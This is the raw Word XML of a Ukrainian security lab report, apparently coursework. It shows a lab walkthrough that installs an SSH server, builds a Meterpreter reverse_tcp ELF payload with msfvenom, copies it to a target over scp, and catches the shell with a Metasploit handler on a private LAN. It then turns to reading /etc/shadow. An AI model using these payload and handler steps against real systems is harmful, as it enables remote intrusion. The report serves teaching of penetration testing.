      <w:r w:rsidR="00071A4E" w:rsidRPr="00071A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00071A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00071A4E">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00071A4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та </w:t>
      </w:r>
      <w:r w:rsidR="00261A41">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00261A41">
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00261A41">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00261A41">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00261A41">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00261A41" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00261A41">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00FC6956">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00FC6956">
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00FC6956">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>releases</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00FC6956">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00FC6956">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00FC6956">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C17" w:rsidRPr="00FC6956">
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D790E3" w14:textId="77777777" w:rsidR="00BE5C17" w:rsidRPr="00074423" w:rsidRDefault="00BE5C17" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo sed -i.bak 's/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/\/ua\.archive\.ubuntu\.com\/ubuntu/http:\/\/old-releases\.ubuntu\.com\/ubuntu/g' /etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61945DB6" w14:textId="33DE24CA" w:rsidR="00BE5C17" w:rsidRPr="00074423" w:rsidRDefault="00BE5C17" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo sed -i.bak 's/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/\/security\.ubuntu\.com\/ubuntu/http:\/\/old-releases\.ubuntu\.com\/ubuntu/g' /etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F431CC4" w14:textId="77777777" w:rsidR="00B26F80" w:rsidRDefault="00B26F80" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2039BDFE" w14:textId="1E849489" w:rsidR="00D748AF" w:rsidRPr="00D748AF" w:rsidRDefault="00D748AF" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Встановимо</w:t>
      </w:r>
      <w:r w:rsidR="007A21A4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00337D8A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidR="00337D8A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-сервер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16287F25" w14:textId="31D3AA51" w:rsidR="00DB2F72" w:rsidRPr="00B50D48" w:rsidRDefault="00DB2F72" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B50D48">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50D48">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49D600" w14:textId="6EF843D6" w:rsidR="00DB2F72" w:rsidRPr="00B50D48" w:rsidRDefault="00DB2F72" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B50D48">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00B42641" w:rsidRPr="00B50D48">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt install openssh-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A48CB8F" w14:textId="4DAA99D1" w:rsidR="002C0C79" w:rsidRPr="00B50D48" w:rsidRDefault="002C0C79" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B50D48">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B50D48">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo systemctl enable ssh</w:t>
      </w:r>
      <w:r w:rsidR="00491B62" w:rsidRPr="00B50D48">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> --now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B407142" w14:textId="77777777" w:rsidR="00B26F80" w:rsidRDefault="00B26F80" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565AB671" w14:textId="7245DFB8" w:rsidR="00403B54" w:rsidRPr="005B0DAB" w:rsidRDefault="003068A4" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Створимо </w:t>
      </w:r>
      <w:r w:rsidR="005B0DAB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">корисне навантаження з </w:t>
      </w:r>
      <w:r w:rsidR="005B0DAB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="005B0DAB" w:rsidRPr="00646F99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B0DAB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="003D7EB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r w:rsidR="00A74AAD">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>надішлемо його на цільову ОС</w:t>
      </w:r>
      <w:r w:rsidR="005B0DAB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74201D" w14:textId="436D4199" w:rsidR="00A80680" w:rsidRPr="00C57DB8" w:rsidRDefault="00A80680" w:rsidP="00A80680">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ msfvenom -p linux/x64/meterpreter/</w:t>
      </w:r>
      <w:r w:rsidR="003068A4" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_tcp LHOST=192.168.1.18 LPORT=2291 -f elf &gt; task4.</w:t>
      </w:r>
      <w:r w:rsidR="00AF335A" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A95933" w14:textId="268858CF" w:rsidR="005E33EA" w:rsidRPr="00C57DB8" w:rsidRDefault="00A80680" w:rsidP="00A80680">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ scp task4.</w:t>
      </w:r>
      <w:r w:rsidR="000C7E30" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>amd64</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sam@192.168.1.21:/home/sam/</w:t>
      </w:r>
      <w:r w:rsidR="007A10F7" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>lab3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24823AD8" w14:textId="00F5ED0F" w:rsidR="005E33EA" w:rsidRDefault="00E03E9B" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75940EFE" wp14:editId="24E169D5">
            <wp:extent cx="6645910" cy="2132965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="64547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772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617" w14:textId="77777777" w:rsidR="00B66B53" w:rsidRDefault="00B66B53" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C874ADF" w14:textId="61BCB4E3" w:rsidR="00B66B53" w:rsidRPr="00BE4C04" w:rsidRDefault="00B85A37" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Відкриємо консоль </w:t>
      </w:r>
      <w:r w:rsidR="00947996">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="005258E1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. В</w:t>
      </w:r>
      <w:r w:rsidR="00BA1E48">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ідкриємо порт</w:t>
      </w:r>
      <w:r w:rsidR="00947996">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2291</w:t>
      </w:r>
      <w:r w:rsidR="00BA1E48">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для вхідних підключень</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE4C04">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD11495" w14:textId="57A1A8A7" w:rsidR="00B66B53" w:rsidRPr="00C57DB8" w:rsidRDefault="00CB4DD4" w:rsidP="00B66B53">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00B66B53" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00BE4C04" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00BE4C04" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E62E96" w14:textId="5FDA8C67" w:rsidR="00CB4DD4" w:rsidRPr="00C57DB8" w:rsidRDefault="00FD362B" w:rsidP="00B66B53">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00CB4DD4" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E163C7F" w14:textId="7F58C442" w:rsidR="00B66B53" w:rsidRPr="00C57DB8" w:rsidRDefault="00F63D91" w:rsidP="00B66B53">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B66B53" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>set payload linux/x64/meterpreter/</w:t>
      </w:r>
      <w:r w:rsidR="00D240B3" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="00B66B53" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BAC55" w14:textId="06D80403" w:rsidR="00B66B53" w:rsidRPr="00C57DB8" w:rsidRDefault="00F63D91" w:rsidP="00B66B53">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B66B53" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidR="00D64B8C" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00B66B53" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>HOST 192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="00A321E4" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAEE456" w14:textId="13186425" w:rsidR="00B66B53" w:rsidRPr="00C57DB8" w:rsidRDefault="00F63D91" w:rsidP="00B66B53">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B66B53" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>set LPORT 2291</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CCA0EA" w14:textId="69733C9D" w:rsidR="00B66B53" w:rsidRPr="00C57DB8" w:rsidRDefault="004D2CAC" w:rsidP="00B66B53">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B66B53" w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7631C42C" w14:textId="414FA400" w:rsidR="005E33EA" w:rsidRDefault="004C0801" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2753684C" wp14:editId="0B54F57A">
            <wp:extent cx="6645910" cy="2559050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="121129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972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902A" w14:textId="77777777" w:rsidR="006B7C63" w:rsidRDefault="006B7C63" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24489449" w14:textId="7208B3E7" w:rsidR="006B7C63" w:rsidRPr="00B95BAF" w:rsidRDefault="006B7C63" w:rsidP="00BE5C17">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">На цільовій ОС запустимо </w:t>
      </w:r>
      <w:r w:rsidR="00D044BE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>програму:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A560574" w14:textId="2CC96E7F" w:rsidR="004C398C" w:rsidRPr="00C57DB8" w:rsidRDefault="004C398C" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo chmod ugo+rwx task4.amd64 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2594AADD" w14:textId="4279CB75" w:rsidR="000A6632" w:rsidRPr="00C57DB8" w:rsidRDefault="004C398C" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57DB8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>/task4.amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D33AAD" w14:textId="52D2E0DF" w:rsidR="000A6632" w:rsidRDefault="000A6632" w:rsidP="00BE5C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09B435" wp14:editId="3253565B">
            <wp:extent cx="5723809" cy="1400000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84494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6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E070" w14:textId="77777777" w:rsidR="00CC0B55" w:rsidRDefault="00CC0B55" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BEEC5C9" w14:textId="5C1A7564" w:rsidR="00F65FB9" w:rsidRPr="00233A48" w:rsidRDefault="0020539E" w:rsidP="00BE5C17">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На ОС атакуючо</w:t>
      </w:r>
      <w:r w:rsidR="00380D5B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>го маємо відкритий шел</w:t>
      </w:r>
      <w:r w:rsidR="00BE681C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Можемо переконатися в тому, що </w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sam</w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6" w:rsidRPr="00D41BF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6" w:rsidRPr="00D41BF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>це звич</w:t>
      </w:r>
      <w:r w:rsidR="00233A48">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="002E6C3E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidR="00233A48">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>й користувач, спробувавши відкрити</w:t>
      </w:r>
      <w:r w:rsidR="00837F55" w:rsidRPr="00837F55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00837F55">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>файл</w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D41BF6" w:rsidRPr="005571B0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidR="00837F55">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
